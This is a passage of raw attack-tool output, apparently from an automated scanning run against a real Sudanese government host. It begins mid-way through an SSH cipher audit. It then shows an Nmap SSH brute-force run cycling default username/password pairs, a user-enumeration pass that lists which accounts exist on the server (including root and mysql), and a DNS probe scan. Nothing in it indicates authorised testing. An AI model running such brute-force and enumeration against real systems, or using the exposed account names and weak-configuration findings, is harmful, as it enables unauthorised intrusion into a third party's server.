- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- # message authentication code algorithms
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # algorithm recommendations (for OpenSSH 7.4)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:01 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- Nmap scan report for dawa.gov.sd (37.58.63.157)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 348 guesses in 182 seconds, average tps: 1.9
- | ssh-hostkey:
- | 2048 f9:ea:f1:f9:88:4c:35:23:4f:31:fb:38:17:f9:40:39 (RSA)
- | 256 8c:07:13:65:fe:ef:69:09:f4:fb:ee:49:91:5a:33:38 (ECDSA)
- |_ 256 37:44:b4:9d:a4:1f:48:a1:d0:60:fe:4a:73:6c:99:67 (ED25519)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), HP P2000 G3 NAS device (93%), Android 4.1.1 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 20.04 ms 10.246.200.1
- 2 20.78 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 24.05 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 21.84 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 20.76 ms motl-b1-link.telia.net (62.115.162.41)
- 6 ...
- 7 119.53 ms ldn-bb3-link.telia.net (62.115.113.21)
- 8 118.17 ms prs-bb3-link.telia.net (62.115.134.92)
- 9 118.54 ms ffm-bb3-link.telia.net (62.115.123.12)
- 10 118.58 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 112.76 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
- 12 112.69 ms po-5.ce02.fra-10.de.leaseweb.net (178.162.223.153)
- 13 ...
- 14 112.76 ms 37.58.63.157
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => dawa.gov.sd
- RHOST => dawa.gov.sd
- [*] 37.58.63.157:22 - SSH - Using malformed packet technique
- [*] 37.58.63.157:22 - SSH - Starting scan
- [-] 37.58.63.157:22 - SSH - User 'admin' not found
- [-] 37.58.63.157:22 - SSH - User 'administrator' not found
- [-] 37.58.63.157:22 - SSH - User 'anonymous' not found
- [-] 37.58.63.157:22 - SSH - User 'backup' not found
- [-] 37.58.63.157:22 - SSH - User 'bee' not found
- [+] 37.58.63.157:22 - SSH - User 'ftp' found
- [-] 37.58.63.157:22 - SSH - User 'guest' not found
- [-] 37.58.63.157:22 - SSH - User 'GUEST' not found
- [-] 37.58.63.157:22 - SSH - User 'info' not found
- [+] 37.58.63.157:22 - SSH - User 'mail' found
- [-] 37.58.63.157:22 - SSH - User 'mailadmin' not found
- [-] 37.58.63.157:22 - SSH - User 'msfadmin' not found
- [+] 37.58.63.157:22 - SSH - User 'mysql' found
- [+] 37.58.63.157:22 - SSH - User 'nobody' found
- [-] 37.58.63.157:22 - SSH - User 'oracle' not found
- [-] 37.58.63.157:22 - SSH - User 'owaspbwa' not found
- [+] 37.58.63.157:22 - SSH - User 'postfix' found
- [-] 37.58.63.157:22 - SSH - User 'postgres' not found
- [-] 37.58.63.157:22 - SSH - User 'private' not found
- [-] 37.58.63.157:22 - SSH - User 'proftpd' not found
- [-] 37.58.63.157:22 - SSH - User 'public' not found
- [+] 37.58.63.157:22 - SSH - User 'root' found
- [-] 37.58.63.157:22 - SSH - User 'superadmin' not found
- [-] 37.58.63.157:22 - SSH - User 'support' not found
- [-] 37.58.63.157:22 - SSH - User 'sys' not found
- [-] 37.58.63.157:22 - SSH - User 'system' not found
- [-] 37.58.63.157:22 - SSH - User 'systemadmin' not found
- [-] 37.58.63.157:22 - SSH - User 'systemadministrator' not found
- [-] 37.58.63.157:22 - SSH - User 'test' not found
- [-] 37.58.63.157:22 - SSH - User 'tomcat' not found
- [-] 37.58.63.157:22 - SSH - User 'user' not found
- [-] 37.58.63.157:22 - SSH - User 'webmaster' not found
- [-] 37.58.63.157:22 - SSH - User 'www-data' not found
- [-] 37.58.63.157:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- ########################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:05 EDT
- Nmap scan report for dawa.gov.sd (37.58.63.157)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain (unknown banner: none)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: none
- | fingerprint-strings:
- | DNSVersionBindReqTCP:
- | version
- | bind
- |_ none
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port53-TCP:V=7.70%I=7%D=5/2%Time=5CCACF1E%P=x86_64-pc-linux-gnu%r(DNSVe
- SF:rsionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x0
- SF:4bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0
- SF:\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Oracle VM Server 3.4.2 (Linux 4.1) (92%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- Host script results:
- | dns-brute:
- |_ DNS Brute-force hostnames: No results.
